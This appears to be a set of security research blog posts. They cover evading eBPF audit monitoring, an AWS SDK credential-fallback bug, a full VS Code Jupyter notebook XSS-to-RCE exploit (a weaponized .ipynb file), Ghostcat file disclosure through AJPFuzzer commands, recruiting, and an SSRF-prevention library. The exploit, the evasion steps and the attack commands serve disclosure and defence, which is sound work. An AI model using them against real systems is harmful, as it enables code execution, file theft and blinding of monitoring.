A security monitoring solution may only be interested in auditing a specific user or cgroup (such in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources to a group of processes. It is used in many containerization technologies (behind the scenes Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes will keep the id of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the important session cgroup. The simplest evasion to this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing PAM configuration are also potential opportunities to affect the cgroup/session correlation.

Another technique involves being reallocated by init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

  1. Open a new eBPF-monitored session
  2. Start tmux by executing the tmux command
  3. Detach from tmux by pressing CTRL+B and then D
  4. Kill the bash process that is tmux’s parent
  5. Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

CGroupV2 evasion PoC

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround on the instruction limit is set, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility very soon when the execution gets complicated. But even when workarounds are used (e.g., when using multiple probes to trace the same events but capture different data, or split your code into multiple programs that call each other using a program map) there still may be a chance to abuse it. BPF programs are not meant to be run forever, but they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process arguments and its environment variables, the emitted event could have too many argv and too many envp. Even in that case, you may miss some of them because the loop stops earlier. In these cases, the event data will be truncated. It’s important to note that these limitations are different based on the kernel where BPF is being run, and how the endpoint agent is written.

Another peculiarity of eBPFs is that they’ll drop events if they can not be consumed fast enough, instead of dragging down the performance of the entire system with it. An attacker could abuse this by generating a sufficient number of events to fill up the perf ringbuffer and overwrite data before the agent can read it.

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe) it is probably stuck with file descriptors and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors, (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of seccomp-bpf & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared libraries preloading methods to tamper with the behavior of legit binaries of the solution, ultimately performing harmful actions. In case an attacker succeeds in altering the solution’s host environment, they can add in front of the LD_LIBRARY_PATH, a directory where they saved a malicious library having the same libbcc.so name and exporting all the symbols used (to avoid a runtime linkage error). When the solution starts, instead of the legit bcc library, it gets linked with the malicious library. Defenses against this may include using statically linked programs, linking the library with the full path, or running the program into a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

The Danger of Falling to System Role in AWS SDK Client

17 October 2022 at 22:00

CloudsecTidbit

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

  • How is the infrastructure configured?
  • Are there any public buckets?
  • Are the VPC networks isolated?
  • Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

  • Which services provided by the cloud vendor are used?
  • Among the used services, which ones are directly integrated within the web platform logic?
  • How is the web application using such services?
  • How are they combined to support the internal logic?
  • Is the usage of services ever exposed or reachable by the end-user?
  • Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

  1. 1) Environment variables
  2. 2) Shared credentials file
  3. 3) If the application uses ECS task definition or RunTask API operation, IAM role for tasks
  4. 4) If the application is running on an Amazon EC2 instance, IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is an often recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

  • S3 bucket name - Import from public source case;

    OR

  • S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(session *Session, config *aws.Config, bucket_name string){

	//initilize or re-initilize the S3 client
	S3svc := s3.New(session, config)

	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
			Bucket:  bucket_name
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return err, nil
	}

	aws_config = &aws.Config{
		Region: region,
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)
    
...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
		if err, awsError := err.(awserr.Error); awsError {
			aws_config.credentials = nil
			getObjectsList(session_init, aws_config, bucket_name)
		}
}

The error handling was setting aws_config.credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in them being fetched from the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credential object for the initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

var session = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: The credentials should not be hardcoded in code. Instead retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The vulnerability could be also found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

  1. Is the code path directly reachable from an end-user input point (feature or exposed API)?

    e.g., AWS credentials taken from the user settings page within the platform or a user submits an AWS public resource to have it fetched/modified by the platform.

  2. How are the client’s credentials initialized?

    • credential provider chain - Look for the machine owned role in the chain
      • Is there a fall-back condition? Look if the end-user can reach that code path with some inputs. If it is used by default, go on - Look for the role’s permissions
    • aws.Config structure as input parameter - Look for the passed role’s permissions
  3. Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

    e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use the AnonymousAWSCredentials to configure the AWS SDK client when dealing with public resources.

From the official AWS documentations:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

In case of user provided credentials being used to integrate with other cloud services, the platform should avoid implementing fall-back to system role patterns. Ensure that the user provided credentials are correctly set to avoid ending up with aws.Config.Credentials = nil because it would result in the client using the credentials provider chain → System role.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Visual Studio Code Jupyter Notebook RCE

26 October 2022 at 22:00

I spared a few hours over the past weekend to look into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation venues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage’s reply to leak the path of current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in a malformed JSON. The injection happens within a JSON file (double-quoted) and our Javascript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that is extracting the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, examples of the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend candidates to feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to manage efficiently the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potential discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimental fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz on arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the discosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

safeurl for Go

12 December 2022 at 23:00

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF in numerous programming languages exist, Go didn’t have an easy to use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does safeurl Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via the safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

import (
    "fmt"
    "github.com/doyensec/safeurl"
)

func main() {
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        fmt.Errorf("request return error: %v", err)
    }

    // read response body
}

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

  • allowed traffic only for ports 80 and 443
  • allowed traffic which uses HTTP or HTTPS protocols
  • blocked traffic to private IP addresses
  • blocked IPv6 traffic to any address
  • mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemas the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR range the application is allowed to connect to
BlockedCIDR             - list of CIDR range the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure others standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single schema:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// **Incorrect.** This configuration will allow traffic to the last allowed port (443), and overwrite any that was set before
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the IP points to an allowed destination. However, at the time-of-use (TOU), it will point to a completely different IP address.

DNS rebinding protection in safeurl is accomplished by performing the allow/block list validations on the actual IP address which will be used to make the HTTP request. This is achieved by utilizing Go’s net/dialer package and the provided Control hook. As stated in the official documentation:

